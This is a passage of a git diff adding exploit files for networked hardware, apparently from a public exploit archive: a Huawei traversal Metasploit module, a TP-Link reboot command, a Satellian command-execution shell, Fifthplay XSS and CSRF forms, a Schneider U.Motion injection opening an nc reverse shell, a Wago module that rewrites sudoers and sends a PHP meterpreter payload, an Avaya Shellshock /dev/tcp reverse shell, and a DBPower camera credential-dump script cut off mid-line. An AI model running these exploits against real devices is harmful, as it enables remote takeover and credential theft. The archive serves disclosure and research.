+# web site for more information on licensing and terms of use.
+#
+##
+
+
+class MetasploitModule < Msf::Auxiliary
+   include Msf::Exploit::Remote::HttpClient
+
+   def initialize
+       super(
+           'Name'        => 'Huawei HG255 Directory Traversal',
+           ‘Description’ => ‘Server Directory Traversal at Huawei HG255 by malicious GET requests’,
+           ‘Author’      => ‘Ismail Tasdelen’,
+           ‘License’     => MSF_LICENSE,
+           ‘References’     =>
+           [
+              ['CVE', '2017-17309' ],
+              ['URL', 'https://www.huawei.com/en/psirt/security-notices/huawei-sn-20170911-01-hg255s-en']
+           ]
+       )
+       register_options(
+           [
+               Opt::RPORT(80)
+           ], self.class
+       )
+   end
+
+   def run
+       urllist=[
+           ‘/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/lib/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/res/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’,
+           ‘/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd’]
+
+       urllist.each do |url|
+           begin
+               res = send_request_raw(
+               {
+                       ‘method’=> ‘GET’,
+                       ‘uri’=> url
+               })
+
+               if res
+                   print_good(“Vulnerable! for #{url}”)
+               else
+                   print_status(“Vulnerable(no response) detected for #{url}”)
+               end
+           rescue Errno::ECONNRESET
+               print_status(“Vulnerable(rst) detected for #{url}”)
+           rescue Exception
+               print_error(“Connection failed.”)
+           end
+       end
+   end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47958.txt b/exploits/hardware/webapps/47958.txt
new file mode 100644
index 000000000..863a1d4ed
--- /dev/null
+++ b/exploits/hardware/webapps/47958.txt
@@ -0,0 +1,32 @@
+# Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
+# Date: 2020-01-20
+# Exploit Author: PCEumel
+# Vendor Homepage: https://www.tp-link.com/
+# Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware
+# Version: TP-Link TP-SG105E V4
+# Tested on: TP-SG105E V4 1.0.0 Build 20181120
+# Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
+# CVE : CVE-2019-16893
+
+# TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
+# The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".
+# It features a web front end and an application (Easy Smart Configuration Utility)
+# for easy configuration management.
+
+# The device does not properly restrict access to an internal API.
+# It is therefore possible to remotely reboot the device by sending a HTTP POST
+# request.
+
+---
+
+# POC :
+curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi
+
+---
+
+Timeline :
+2019-09-16 | Vendor notified 
+2019-09-25 | Reply (they will patch it)
+2019-12-24 | First patch for testing
+2019-12-19 | Confirmed the functionality of the patch
+2020-01-14 | Public patch available
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47961.txt b/exploits/hardware/webapps/47961.txt
new file mode 100644
index 000000000..d94e2ab01
--- /dev/null
+++ b/exploits/hardware/webapps/47961.txt
@@ -0,0 +1,22 @@
+# Exploit Title:  Genexis Platinum-4410 2.1 - Authentication Bypass
+# Date: 20220-01-08
+# Exploit Author: Husinul Sanub
+# Author Contact: https://www.linkedin.com/in/husinul-sanub-658239106/
+# Vulnerable Product: Genexis Platinum-4410 v2.1 Home Gateway Router https://genexis.co.in/product/ont/
+# Firmware version: P4410-V2–1.28
+# Vendor Homepage: https://genexis.co.in/
+# Reference: https://medium.com/@husinulzsanub/exploiting-router-authentication-through-web-interface-68660c708206
+# CVE: CVE-2020-6170
+
+Vulnerability Details
+======================
+Genexis Platinum-4410 v2.1 Home Gateway Router discloses passwords of each users(Admin,GENEXIS,user3) in plain text behind login page source “http://192.168.1.1/cgi-bin/index2.asp". This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, changing passwords, upload malicious firmware etc.
+
+How to reproduce
+===================
+Suppose 192.168.1.1 is the router IP and check view page source of login page “http://192.168.1.1/cgi-bin/index2.asp",There we can found passwords for each login accounts in clear text.
+
+
+POC
+=========
+* https://youtu.be/IO_Ez4XH-0Y
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47976.py b/exploits/hardware/webapps/47976.py
new file mode 100755
index 000000000..c4acd7244
--- /dev/null
+++ b/exploits/hardware/webapps/47976.py
@@ -0,0 +1,96 @@
+# Exploit Title: Satellian 1.12 - Remote Code Execution
+# Date: 2020-01-28
+# Exploit Author: Xh4H
+# Vendor Homepage: https://www.intelliantech.com/?lang=en
+# Version: v1.12+
+# Tested on: Kali linux, MacOS
+# CVE : CVE-2020-7980
+
+# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
+
+# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
+#                   ________________________________________
+#         (__)    /                                        \
+#         (oo)   (     Intellian Satellite Terminal PoC     )
+#   /-------\/ --' \________________________________________/ 
+#  / |     ||
+# *  ||----||             
+
+# Performing initial scan. Listing available system binaries.
+# Starting request to http://<redacted>
+# Executing command /bin/ls /bin
+# acu_server
+# acu_tool
+# addgroup
+# adduser
+# ...
+
+# Satellian $ id
+# uid=0(root) gid=0(root)
+
+import requests
+import argparse
+import sys
+import calendar
+import time
+from termcolor import colored
+
+def cprint(text, color): # colored print
+	sys.stdout.write(colored(text + "\n", color, attrs=["bold"]))
+
+def httpize(url):
+	if not url.startswith("http"):
+		cprint("Missing protocol, using http . . .", "yellow")
+		url = "http://" + url
+	return url
+
+def send_command(url, command, verbose):
+	RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}}
+	string_to_split = '''"SUCCESS_"
+},'''
+
+	if verbose:
+		cprint("Starting request to %s" % url, "yellow")
+		cprint("Executing command %s" % command, "yellow")
+
+	a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})
+	command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')
+
+	if len(command_output) < 4 and verbose:
+		cprint("Target doesn't seem to be vulnerable\nExiting.", 'red')
+		sys.exit()
+	print command_output
+
+cprint("""
+                  ________________________________________
+         (__)    /                                        \\
+         (oo)   (     Intellian Satellite Terminal PoC     )
+  /-------\\/ --' \\________________________________________/ 
+ / |     ||
+*  ||----||             
+""", "green")
+
+parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980")
+parser.add_argument("-u", "--url", help="Base url")
+args = parser.parse_args()
+
+if args.url is None:
+	cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red")
+	sys.exit()
+
+url = httpize(args.url)
+
+def main():
+	cprint("Performing initial scan. Listing available system binaries.", "green")
+	send_command(url, '/bin/ls /bin', True)
+
+	while True:
+		command = raw_input('Satellian $ ')
+		send_command(url, command, False)
+
+if __name__ == '__main__':
+	try:
+		main()
+	except Exception as e:
+		print e
+		print "\nAn error happened."
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47979.txt b/exploits/hardware/webapps/47979.txt
new file mode 100644
index 000000000..de393c51c
--- /dev/null
+++ b/exploits/hardware/webapps/47979.txt
@@ -0,0 +1,120 @@
+# Exploit Title: Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
+# Date: 2020-01-29
+# Exploit Author: LiquidWorm
+# Vendor: Fifthplay NV
+# Vendor Homepage: https://www.fifthplay.com
+# Version: 2019.2_HP
+# Tested on: Linux
+# CVE : -
+
+Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS
+
+
+Vendor: Fifthplay NV
+Product web page: https://www.fifthplay.com
+Affected version: Platform: HAM V1.2
+                            HAM V1.1
+                            HAM V1.0
+                            DINHAM 10W
+                  Image Version: 2019.3-20190605144803
+                                 2019.2_HP-20190808154634
+                                 2018.4_HP-20181015152950
+                                 2018.2-20180516100815
+                                 2017.2_HP-20180213083050
+                                 2013.4_HP-201309301203
+                  AMP Version: 2019.2_HP
+                               2018.4_HP
+                               2017.2_HP
+                               2013.4_HP
+                               R20.19.03
+                               R20.18.02
+                  Fix: 2017.2-HP4
+                       2018.4_HP3
+                       2018.5_HP7
+                       2019.2_HP3
+                       2019.3_HP1
+
+Summary: Fifthplay is a Belgian high-tech player and a subsidiary of Niko Group. 
+We specialise in enriching smart homes and buildings for almost 10 years, and in
+services that provide comfort and energy. Our gateway provides a modular approach
+to integrating old and new technologies, such as smart meters, optical meters,
+sockets, switches. Fifthplay is a trendsetter with regards to smart homes and buildings
+and one of the sector's most innovative companies.
+
+Desc: The application suffers from an unauthenticated stored XSS through POST request.
+The issue is triggered when input passed via several parameters is not properly
+sanitized before being returned to the user. This can be exploited to execute arbitrary
+HTML and script code in a user's browser session in context of an affected site. The
+application interface also allows users to perform certain actions via HTTP requests
+without performing any validity checks to verify the requests. This can be exploited
+to perform certain actions if a user visits a malicious web site.
+
+Tested on: lighttpd/1.4.33
+           PHP/5.4.33
+           PHP/5.3.19
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5561
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5561.php
+
+
+29.09.2019
+
+--
+
+
+Stored XSS:
+-----------
+
+<html>
+  <body>
+    <form action="http://192.168.11.1/?page=networksettings" method="POST">
+      <input type="hidden" name="server" value='"><script>prompt(251)</script>' />
+      <input type="hidden" name="port" value='"><script>prompt(252)</script>' />
+      <input type="hidden" name="auth" value="1" />
+      <input type="hidden" name="user" value='"><script>prompt(253)</script>' />
+      <input type="hidden" name="pass" value='"><script>prompt(254)</script>' />
+      <input type="hidden" name="submit" value="Change" />
+      <input type="submit" value="Write" />
+    </form>
+  </body>
+</html>
+
+
+Set proxy CSRF:
+---------------
+<html>
+  <body>
+    <form action="http://192.168.11.1/?page=networksettings" method="POST">
+      <input type="hidden" name="server" value="proxy.segfault.mk" />
+      <input type="hidden" name="port" value="8080" />
+      <input type="hidden" name="auth" value="1" />
+      <input type="hidden" name="user" value="testuser" />
+      <input type="hidden" name="pass" value="testpass" />
+      <input type="hidden" name="submit" value="Change" />
+      <input type="submit" value="Write" />
+    </form>
+  </body>
+</html>
+
+
+Delete proxy CSRF:
+------------------
+
+<html>
+  <body>
+    <form action="http://192.168.11.1/?page=networksettings" method="POST">
+      <input type="hidden" name="server" value="proxy.segfault.mk" />
+      <input type="hidden" name="port" value="8080" />
+      <input type="hidden" name="auth" value="1" />
+      <input type="hidden" name="user" value="testuser" />
+      <input type="hidden" name="pass" value="testpass" />
+      <input type="hidden" name="delete" value="Delete" />
+      <input type="submit" value="Clear" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47991.py b/exploits/hardware/webapps/47991.py
new file mode 100755
index 000000000..443299dc4
--- /dev/null
+++ b/exploits/hardware/webapps/47991.py
@@ -0,0 +1,226 @@
+# Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection
+# Date: 2018-08-01
+# Exploit Author: Cosmin Craciun
+# Vendor Homepage: https://www.se.com
+# Version: <= 1.3.4
+# Tested on: Delivered Virtual Appliance running on Windows 10 x64
+# CVE : CVE-2018-7777
+# References: https://github.com/cosmin91ro
+
+#!/usr/bin/oython
+
+
+from __future__ import print_function
+import httplib
+import urllib
+import argparse
+import re
+import sys
+import socket
+import threading
+import time
+
+parser = argparse.ArgumentParser(description='PoC')
+parser.add_argument('--target',  help='IP or hostname of target', required=True)
+parser.add_argument('--port',  help='TCP port the target app is running', required=True, default='8080')
+parser.add_argument('--username',  help='TCP port the target app is running', required=True, default='admin')
+parser.add_argument('--password',  help='TCP port the target app is running', required=True, default='admin')
+parser.add_argument('--command', help='malicious command to run', default='shell')
+parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
+parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)
+
+class Exploiter(threading.Thread):
+    def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
+        threading.Thread.__init__(self)
+        self.target = target
+        self.port = port
+        self.timeout = timeout
+        self.uri = uri
+        self.body = body
+        self.headers = headers
+        self.shell_mode = shell_mode
+
+    def send_exploit(self, target, port, timeout, uri, body, headers):
+        print('Sending exploit ...')
+        conn = httplib.HTTPConnection("{0}:{1}".format(target, port), timeout=timeout)
+        conn.request("POST", uri, body, headers)
+        print("Exploit sent")
+        if not self.shell_mode: print("Getting response ...")
+
+        try:
+            response = conn.getresponse()
+            if not self.shell_mode: print(str(response.status) + " " + response.reason)
+            data = response.read()
+            if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))
+
+        except socket.timeout:
+            if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")
+
+    def run(self):
+        self.send_exploit(self.target, self.port, self.timeout, self.uri, self.body, self.headers)
+
+class Listener(threading.Thread):
+    def __init__(self, src_ip):
+        threading.Thread.__init__(self)
+        self.src_ip = src_ip
+
+    def run(self):
+        self.listen(self.src_ip)
+
+    def listen(self, src_ip):
+        TCP_IP = src_ip
+        TCP_PORT = 4444
+        BUFFER_SIZE = 1024
+
+        try:
+            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            s.bind((TCP_IP, TCP_PORT))
+            print("Listener open on port {0}".format(TCP_PORT))
+            s.listen(1)
+
+            conn, addr = s.accept()
+            print('Exploited: ' + str(addr))
+
+            while 1:
+                comm = raw_input("shell$ ").strip()
+                if comm == "quit":
+                    conn.close()
+                    sys.exit(0)
+
+                if comm != "":
+                    conn.send(comm + " 2>&1" + "\x0a")
+                    while 1:
+                        data = conn.recv(BUFFER_SIZE)
+                        if not data: break
+                        print(data, end="")
+                        if "\x0a" in data: break
+
+        except Exception as ex:
+            print("Could not start listener")
+            print(ex)
+
+def login(target, port, username, password):
+    uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)
+
+    params = urllib.urlencode({
+        'username': username,
+        'password': password,
+        'rememberMe': '1',
+        'context': 'configuration',
+        'op': 'login'
+    })
+
+    headers = {
+        "Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
+        "Accept": "*/*"
+    }
+
+    try:
+        conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
+        conn.request("POST", uri, params, headers)
+        response = conn.getresponse()
+        print(str(response.status) + " " + response.reason)
+        data = response.read()
+    except socket.timeout:
+        print("Connection timeout while logging in. Check if the server is available")
+        return
+
+
+    cookie = response.getheader("Set-Cookie")
+    #print(cookie)
+
+    r = re.match(r'PHPSESSID=(.{26});.*loginSeed=(.{32})', cookie)
+    if r is None:
+        print("Regex not match, could not get cookies")
+        return
+
+    if len(r.groups()) < 2:
+        print("Error while getting cookies")
+        return
+
+    sessid = r.groups()[0]
+    login_seed = r.groups()[1]
+
+    return sessid, login_seed
+
+    conn.close()
+
+
+def encode_multipart_formdata(fields, files):
+    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
+    CRLF = '\r\n'
+    L = []
+    for (key, value) in fields:
+        L.append('--' + LIMIT)
+        L.append('Content-Disposition: form-data; name="%s"' % key)
+        L.append('')
+        L.append(value)
+    for (key, filename, value) in files:
+        L.append('--' + LIMIT)
+        L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
+        L.append('Content-Type: application/x-gzip')
+        L.append('')
+        L.append(value)
+    L.append('--' + LIMIT + '--')
+    L.append('')
+    body = CRLF.join(L)
+    content_type = 'multipart/form-data; boundary=%s' % LIMIT
+    return content_type, body
+
+
+def exploit(target, port, username, password, command, timeout):
+    uri = "http://{0}:{1}/umotion/modules/system/update_module.php".format(target, port)
+
+    fields = [
+        ('choose_update_mode', 'MANUAL'),
+        ('add_button', '0'),
+        ('format', 'json'),
+        ('step', '2'),
+        ('next', '1'),
+        ('name_update_file', ''),
+        ('path_update_file', ''),
+        ('type_update_file', '')
+    ]
+
+    listener = None
+    if command == "shell":
+        shell_mode = True
+        command = "nc -e $SHELL {0} 4444".format(args.src_ip)
+        listener = Listener(args.src_ip)
+        listener.start()
+        time.sleep(3)
+    else:
+        shell_mode = False
+
+    files = [
+        ('update_file', 'my;{0};file.tar.gz'.format(command), "\x1f\x8b")
+    ]
+
+    content_type, body = encode_multipart_formdata(fields, files)
+
+    if not shell_mode or (shell_mode and listener and listener.isAlive()):
+        print('Logging in ...')
+        sess_id, login_seed = login(target, port, username, password)
+        if sess_id is None or login_seed is None:
+            print('Error while logging in')
+            return
+
+        print('Logged in ! ')
+
+        headers = {
+            'Accept': 'application/json,text/javascript,*/*; q=0.01',
+            'Accept-Encoding': 'gzip,deflate',
+            'Referer': 'http://{0}:{1}/umotion/modules/system/externalframe.php?context=configuration'.format(target, port),
+            'X-Requested-With': 'XMLHttpRequest',
+            'Content-Length': len(body),
+            'Content-Type': content_type,
+            'Connection': 'keep-alive',
+            'Cookie': 'PHPSESSID={0}; loginSeed={1}'.format(sess_id, login_seed)
+        }
+
+        exploiter = Exploiter(target, port, timeout, uri, body, headers, shell_mode)
+        exploiter.start()
+
+if __name__ == '__main__':
+    args = parser.parse_args()
+    exploit(args.target, args.port, args.username, args.password, args.command, args.timeout)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47998.rb b/exploits/hardware/webapps/47998.rb
new file mode 100755
index 000000000..c06cd414d
--- /dev/null
+++ b/exploits/hardware/webapps/47998.rb
@@ -0,0 +1,198 @@
+# Exploit Title: Wago PFC200 - Authenticated Remote Code Execution (Metasploit)
+# Date: 2020-02-05
+# Exploit Author: Nico Jansen (0x483d)
+# Vendor Homepage: https://www.wago.com/
+# Version: <= Firmare 11 (02_08_35)
+# Tested on: Linux
+# CVE : N/A
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'json'
+
+class MetasploitModule < Msf::Exploit::Remote
+  #Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Wago PFC200 authenticated remote code execution',
+      'Description' => %q{
+        The Wago PFC200 (up to incl. Firmware 11 02_08_35) is vulnerable to an authenticated remote code execution in the
+        administrative web interface. By exploiting the vulnerability, an attacker is able to run system commands in root context.
+        To execute this module, login credenials of the website administrator are required (default: admin/wago).
+        This module was tested against a Wago 750-8202 Firmware 11 (02_08_35) but other PFC200 models may be affected as well.
+      },
+      'Author' =>
+        [
+          'Nico Jansen (0x483d)' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'php',
+      'References' =>
+        [
+          ['CVE', '-'],
+          ['US-CERT-VU', '-'],
+          ['URL', '-'],
+          ['URL', '-']
+        ],
+      'DisclosureDate' => 'Aug 1 2018',
+      'Privileged' => true,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+        'SSL' => true,
+      },
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget'   => 0))
+
+      register_options(
+        [
+          Opt::RPORT(443),
+          OptString.new('ADMINPASSWORD', [true, 'Password to authenticate as admin', 'wago']),
+        ])
+
+        deregister_options('VHOST')
+  end
+
+  # This function checks the index page to check if it may be a valid device.
+  # There are some more checks done after an successful authentication
+  def check
+    @csrf=""
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/wbm/index.php'
+    )
+
+    if res && res.code == 200 && res.body.to_s =~ /WAGO Ethernet Web-based Management/
+      result = sendConfigToolMessage("get_typelabel_value", ["SYSDESC"])
+      if result and result =~ /PFC200/
+        # Get Version and check if it's <= 11
+        result = sendConfigToolMessage("get_coupler_details", ["firmware-revision"])
+        result = result.split('(')[1]
+        result = result.split(')')[0]
+        if Integer(result) <= 11
+          return Exploit::CheckCode::Vulnerable
+        else
+          return Exploit::CheckCode::Safe
+        end
+      end
+      return Exploit::CheckCode::Safe
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  # This function authenticates the adminuser against the Wago PLC
+  def login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/wbm/login.php',
+      'data' => '{"username":"admin","password":"' + datastore['ADMINPASSWORD'] + '"}'
+    )
+    if res.code != 200
+      return false
+    end
+
+    parsed_json = JSON.parse(res.body.to_s)
+    if parsed_json["status"] == 0
+      @cookie = res.get_cookies
+      @csrf = parsed_json["csrfToken"]
+      return true
+    else
+      return false
+    end
+  end
+
+  # This function can be used to execute arbitary commands after login
+  def sendConfigToolMessage(scriptname, parameters, expectResponse=true)
+    parameterString = ''
+    for param in parameters
+      parameterString = parameterString + '"' + param + '", '
+    end
+
+    parameterString = parameterString[0...-2]
+    request ='{"csrfToken":"' + @csrf + '",'\
+      '"renewSession":true,"aDeviceParams":{"0"'\
+      ':{"name":"' + scriptname + '","parameter":['\
+      + parameterString + '],"sudo":true,"multiline":false,'\
+      '"timeout":12000,"dataId":0}}}'
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/wbm/configtools.php',
+      'data' => request,
+      'cookie' => @cookie,
+    )
+    # After exploitation, there is no response, so just return true because the message was sent
+    if expectResponse == false
+      return true
+    end
+
+    parsed_json = JSON.parse(res.body.to_s)
+    @csrf = parsed_json["csrfToken"]
+    if parsed_json["aDeviceResponse"][0]["status"] == 0
+      return parsed_json["aDeviceResponse"][0]["resultString"]
+    else
+      return false
+    end
+  end
+
+  # This function is used to enable php execution in sudoers file using sed
+  def change_sudo_permissions()
+    return sendConfigToolMessage('/../../../usr/bin/sed',["-i", "s/NOPASSWD:/NOPASSWD:ALL#/", "/etc/sudoers"])
+  end
+
+  # Encode a given string to bypass validation
+  def encode(content)
+    result = ""
+    content.split("").each do |i|
+      result = result + "chr(" + (i.ord).to_s + ")."
+    end
+    result = result[0...-1]
+    return result
+  end
+
+  # This function generates the required payload used to connect to the msf listener
+  def send_payload()
+    meterpreter_reverse_php='exec("/usr/bin/sed -i \'s/NOPASSWD:ALL#/NOPASSWD:/\' \'/etc/sudoers\'"); $ip = "' + datastore['LHOST'] + '"; $port = ' + datastore['LPORT'].to_s + '; '\
+    'if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); '\
+    '$s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port);'\
+    ' $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) '\
+    '{ $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) '\
+    '{ die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } '\
+    'if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; '\
+    'case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len);'\
+    ' $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= '\
+    'fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } '\
+    '$GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") '\
+    '&& ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } '\
+    'else { eval($b); } die(); ?>'
+
+    command = "eval(" + encode(meterpreter_reverse_php) + ");"
+    return sendConfigToolMessage("/../../../usr/bin/php5", ["-r", command], false)
+  end
+
+  def exploit
+    if check == Exploit::CheckCode::Vulnerable # Check if the system may be a PFC200
+      print_good("Target seems to be a vulnerable PFC200 device")
+      if login # Try to authenticate using the given credentials
+        print_good("Successfully logged in as website admin")
+        if change_sudo_permissions()
+          print_good("Manipulated the /etc/sudoers file to enable php execution as root")
+          print_good("Preparing meterpreter payload and undoing changes to /etc/sudoers...")
+          send_payload()
+        else
+          print_error("Unable to modify the /etc/sudoers file...")
+        end
+      else
+        print_error("Unable to login as admin with the given credentials...")
+      end
+    else
+      print_error("Target is not a valid PFC200 device. Will exit now...")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48077.txt b/exploits/hardware/webapps/48077.txt
new file mode 100644
index 000000000..25f0a8a09
--- /dev/null
+++ b/exploits/hardware/webapps/48077.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
+# Exploit Author: Sarang Tumne a.k.a SarT
+# Date: 2020-02-14
+# Confirmed on release 5.2
+# Vendor: https://www.avaya.com/en/
+# Avaya's advisory:  
+# https://downloads.avaya.com/css/P8/documents/100183151
+# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
+
+###############################################
+
+#!/usr/bin/python
+
+import sys
+import requests
+ 
+if len(sys.argv) < 4:
+	print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
+	print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" 
+	print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
+	print "[*] Netcat Listener: nc -lvvnp <port>"
+	print "\n"
+	sys.exit()
+
+#Disables request warning for cert validation ignore.
+requests.packages.urllib3.disable_warnings() 
+CM = sys.argv[1]
+url = "https://" + CM + "/mt/mt.cgi"
+attacker_ip = sys.argv[2]
+rev_port = sys.argv[3]
+
+http_headers = {
+		
+		"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
+			
+		}
+
+def main():
+		if len(sys.argv) == 4:
+		  
+		  print "[+] Success, spawning a shell on your custom port :)..."
+		  requests.get(url, headers=http_headers, verify=False, timeout=5)
+		
+		else: 	
+		  print "[-] Something went wrong, quitting..."
+			
+		sys.exit()
+	
+
+if __name__ == "__main__":
+	main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48095.pl b/exploits/hardware/webapps/48095.pl
new file mode 100755
index 000000000..0825ae713
--- /dev/null
+++ b/exploits/hardware/webapps/48095.pl
@@ -0,0 +1,89 @@
+# Exploit Title: DBPower C300 HD Camera - Remote Configuration Disclosure
+# Date: 2020-02-19
+# Author: Todor Donev
+# Vendor: https://donev.eu/
+# CVE: N/A
+#  Copyright 2020 (c) Todor Donev
+#
+#  https://donev.eu/
+#  https://donev.eu/blog/dbpower-c300-multiple-vulnerabilities
+#
+#  Disclaimer:
+#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
+#  caused by direct or indirect use of the  information or functionality provided by these programs. 
+#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
+#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
+#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!  
+#  
+#  (Dont do anything without permissions)
+#
+#
+#	[ DBPower C300 HD Camera Remote Configuration Disclosure
+#	[ ==========================================================
+#	[ Exploit Author: Todor Donev 2020 <todor.donev@gmail.com>
+#	[ Initializing the browser
+#	[ >>  User-Agent => Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112
+#	[ >>  Content-Type => application/x-www-form-urlencoded
+#	[ <<  Connection => close
+#	[ <<  Date => 
+#	[ <<  Accept-Ranges => bytes
+#	[ <<  Server => thttpd/2.25b 29dec2003
+#	[ <<  Content-Length => 25730
+#	[ <<  Content-Type => application/octet-stream
+#	[ <<  Last-Modified => 
+#	[ <<  Client-Date => 
+#	[ <<  Client-Peer => 192.168.1.103:8080
+#	[ <<  Client-Response-Num => 1
+#	[ 
+#	[ Username : admin
+#	[ Password : admin
+#
+#!/usr/bin/perl
+ 
+use strict;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+use Gzip::Faster 'gunzip';
+
+my $host = shift || ''; # Full path url to the store
+my $cmd = shift || ''; # show - Show configuration dump
+$host =~ s/\/$//;
+print  "\033[2J";    #clear the screen
+print  "\033[0;0H"; #jump to 0,0
+print "[ DBPower C300 HD Camera Remote Configuration Disclosure\n";
+print "[ ==========================================================\n";
+print "[ Exploit Author: Todor Donev 2020 <todor.donev\@gmail.com>\n";
+if ($host !~ m/^http/){ 
+        print "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
+        print "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
+        exit;
+}
+print "[ Initializing the browser\n";
+my $user_agent = rand_ua("browsers");
+my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
+   $browser->timeout(30);
+   $browser->agent($user_agent);
+# my $target = $host."/tmpfs/config_backup.bin";
+my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
+my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);                      
+my $response = $browser->request($request) or die "[ Exploit Failed: $!";
+print "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
+print "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
+print "[ Exploit failed! Not vulnerable.\n" and exit if ($response->code ne 200);
+my $gzipped = $response->content();
+my $config = gunzip($gzipped);
+print "[ \n";
+if ($cmd =~ /show/) {
+        print "[ >> Configuration dump...\n[\n";
+        print  "[ ", $_, "\n" for split(/\n/,$config);
+        exit;
+} else {
+        print  "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
